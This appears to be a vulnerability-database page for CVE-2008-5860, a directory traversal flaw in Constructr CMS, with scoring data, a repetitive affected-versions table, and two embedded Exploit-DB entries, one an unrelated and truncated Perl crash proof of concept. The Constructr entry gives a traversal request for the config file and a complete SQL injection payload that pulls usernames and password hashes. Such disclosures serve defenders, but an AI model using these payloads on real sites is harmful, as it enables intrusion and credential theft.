CVE-2008-5860
published 2009-01-06CVE-2008-5860: Directory traversal vulnerability in backend/template.php in Constructr CMS 3.02.5 and earlier, when register_globals is enabled and magic_quotes_gpc is…
PriorityP333medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
2.05%
78.8th percentile
Directory traversal vulnerability in backend/template.php in Constructr CMS 3.02.5 and earlier, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to create or read arbitrary files via directory traversal sequences in the edit_file parameter.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| constructr | constructr-cms | <= 3.02.5 | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
| constructr | constructr-cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
exploitdb·2015-09-06
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
---
# Exploit Title: [ActiveState] Perl.exe x64 Client Denial of Service (v5.20.2)
# Date: 9-3-2015
# Software Link: http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.20.2.2002/ActivePerl-5.20.2.2002-MSWin32-x64-299195.msi
# Exploit Author: Robbie Corley
# Contact: [email protected]
# Website:
# Target(s): Windows 7, Server 2008, server 2012, Windows 8.1, Windows 10
# CVE:
# Category: Denial of Service Exploits
#
# Description:
# A Denial of Service can be achieved by concatenating several large strings together and attempting to write to file.
my $buff = "\x41" x 7000;
my $endofbuff = "\x42" x 5860;
open(myfile,'>orgsched.ocf'); # file extension is irrelevant
pri
Exploit-DB
Constructr CMS 3.02.5 stable - Multiple Vulnerabilities
exploitdb·2008-12-19
CVE-2008-5860 Constructr CMS 3.02.5 stable - Multiple Vulnerabilities
Constructr CMS 3.02.5 stable - Multiple Vulnerabilities
---
Constructr CMS
http://constructr-cms.org/
- <= 3.02.5 "Stable" -
magic_quotes_gpc = Off
register_globals = On
- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
http://site/constructr/backend/template.php?edit_file=
Db info:
../config/config.inc.php
- SQL -
http://site/constructr/?show_page=
User (urlencode) :
-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
"Hash" is the password, not really encrypted...
- Timeline -
Author notified: Dec 12
Public Disclosure: Dec 19
- Seasons Greetings -
- http://nukeit.org -
No writeups or analysis indexed.
2009-01-06
Published